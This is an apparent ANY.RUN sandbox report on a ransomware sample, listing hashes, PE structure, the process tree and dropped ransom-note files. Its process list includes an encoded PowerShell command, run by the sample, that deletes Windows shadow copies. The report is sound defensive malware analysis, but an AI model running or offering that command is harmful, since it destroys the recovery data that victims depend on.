analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580

Full analysis: https://app.any.run/tasks/c034a687-a516-47b9-b9fd-6f0d348e99c7
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Analysis date: October 20, 2020, 11:43:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ransomware
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

3D099C09B63337C19A17363C08326196

SHA1:

8F6E6C896767EE20DA46C66ED9E3F0E0A4310CD7

SHA256:

D175251FA871632560B9CDA897A4F065827E959C83ACDF75FFD82A31E90F5580

SSDEEP:

3072:uhR/b4DZjwvuZAC8UBH0bZp9dO5YUaqX+XEhZ02ULI/JjT8paV:ObsZkvuZkS0bZmX+XEhZ02ULIxjTP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Renames files like Ransomware

      • d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exe (PID: 2532)
  • SUSPICIOUS

    • Application launched itself

      • d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exe (PID: 2720)
    • Creates files in the program directory

      • d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exe (PID: 2532)
    • Executes PowerShell scripts

      • d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exe (PID: 2532)
    • Creates files in the user directory

      • powershell.exe (PID: 4036)
    • Executed as Windows Service

      • vssvc.exe (PID: 3204)
    • Executed via COM

      • unsecapp.exe (PID: 3372)
  • INFO

    • Dropped object may contain TOR URL's

      • d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exe (PID: 2532)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

ProductionVersus: 1.0.6.2
Copyrights: Copyrighd (C) 2020, sdghsd
InternalName: fjsyks.uxe
FileV: 1.0.1
CharacterSet: Unicode
LanguageCode: Chinese (Simplified)
FileSubtype: -
ObjectFileType: Static library
FileOS: Unknown (0x40304)
FileFlags: Pre-release, Patched
FileFlagsMask: 0x006f
ProductVersionNumber: 1.0.0.1
FileVersionNumber: 1.0.2.0
Subsystem: Windows GUI
SubsystemVersion: 5
ImageVersion: -
OSVersion: 5
EntryPoint: 0x32d3
UninitializedDataSize: -
InitializedDataSize: 8662016
CodeSize: 122368
LinkerVersion: 9
PEType: PE32
TimeStamp: 2019:07:30 09:00:00+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 30-Jul-2019 07:00:00
Detected languages:
  • Chinese - PRC
FileV: 1.0.1
InternalName: fjsyks.uxe
Copyrights: Copyrighd (C) 2020, sdghsd
ProductionVersus: 1.0.6.2

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000E8

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 6
Time date stamp: 30-Jul-2019 07:00:00
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x0001DC65
0x0001DE00
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
7.71272
.data
0x0001F000
0x0082DA80
0x00002600
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
1.09024
.samebad\xc3\x03
0x0084D000
0x000003C3
0x00000400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
.hame
0x0084E000
0x00000001
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
.yiwix
0x0084F000
0x00001001
0x00000400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
.rsrc
0x00851000
0x0000EA98
0x0000EC00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
6.03276

Resources

Title
Entropy
Size
Codepage
Language
Type
1
3.38641
452
UNKNOWN
UNKNOWN
RT_VERSION
2
4.8579
2216
UNKNOWN
UNKNOWN
RT_ICON
3
3.6615
1736
UNKNOWN
UNKNOWN
RT_ICON
4
2.34947
1384
UNKNOWN
UNKNOWN
RT_ICON
5
6.39503
9640
UNKNOWN
UNKNOWN
RT_ICON
6
6.99101
4264
UNKNOWN
UNKNOWN
RT_ICON
7
7.00283
2440
UNKNOWN
UNKNOWN
RT_ICON
8
6.81826
1128
UNKNOWN
UNKNOWN
RT_ICON
9
5.70152
3752
UNKNOWN
UNKNOWN
RT_ICON
10
6.22118
2216
UNKNOWN
UNKNOWN
RT_ICON

Imports

GDI32.dll
KERNEL32.dll

Exports

Title
Ordinal
Address
@GetFirstViceCity@4
1
0x000024C0
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exe no specs d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exe powershell.exe no specs unsecapp.exe no specs vssvc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2720"C:\Users\admin\AppData\Local\Temp\d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exe" C:\Users\admin\AppData\Local\Temp\d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2532"C:\Users\admin\AppData\Local\Temp\d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exe" C:\Users\admin\AppData\Local\Temp\d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exe
d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
4036powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exed175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3372C:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\wbem\unsecapp.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Sink to receive asynchronous callbacks for WMI client application
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3204C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
636
Read events
570
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
165
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
4036powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5E1RPTZ5FRYOORQWOOV3.temp
MD5:
SHA256:
2532d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi
MD5:
SHA256:
2532d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim
MD5:
SHA256:
2532d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exec:\recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim.w23xkkg2v
MD5:
SHA256:
2532d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exeC:\recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\w23xkkg2v.htmlbinary
MD5:CC08D13B8FD25159C1AFA4B456B8308E
SHA256:D2965C3BF066690200F7FD66444FCA0B024188769B572925ED8FE5FF4A3A6D9E
2532d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exeC:\users\admin\contacts\w23xkkg2v.htmlbinary
MD5:CC08D13B8FD25159C1AFA4B456B8308E
SHA256:D2965C3BF066690200F7FD66444FCA0B024188769B572925ED8FE5FF4A3A6D9E
2532d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exeC:\users\administrator\w23xkkg2v.htmlbinary
MD5:CC08D13B8FD25159C1AFA4B456B8308E
SHA256:D2965C3BF066690200F7FD66444FCA0B024188769B572925ED8FE5FF4A3A6D9E
2532d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exeC:\users\admin\documents\w23xkkg2v.htmlbinary
MD5:CC08D13B8FD25159C1AFA4B456B8308E
SHA256:D2965C3BF066690200F7FD66444FCA0B024188769B572925ED8FE5FF4A3A6D9E
2532d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exeC:\users\admin\favorites\w23xkkg2v.htmlbinary
MD5:CC08D13B8FD25159C1AFA4B456B8308E
SHA256:D2965C3BF066690200F7FD66444FCA0B024188769B572925ED8FE5FF4A3A6D9E
2532d175251fa871632560b9cda897a4f065827e959c83acdf75ffd82a31e90f5580.exeC:\users\public\w23xkkg2v.htmlbinary
MD5:CC08D13B8FD25159C1AFA4B456B8308E
SHA256:D2965C3BF066690200F7FD66444FCA0B024188769B572925ED8FE5FF4A3A6D9E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info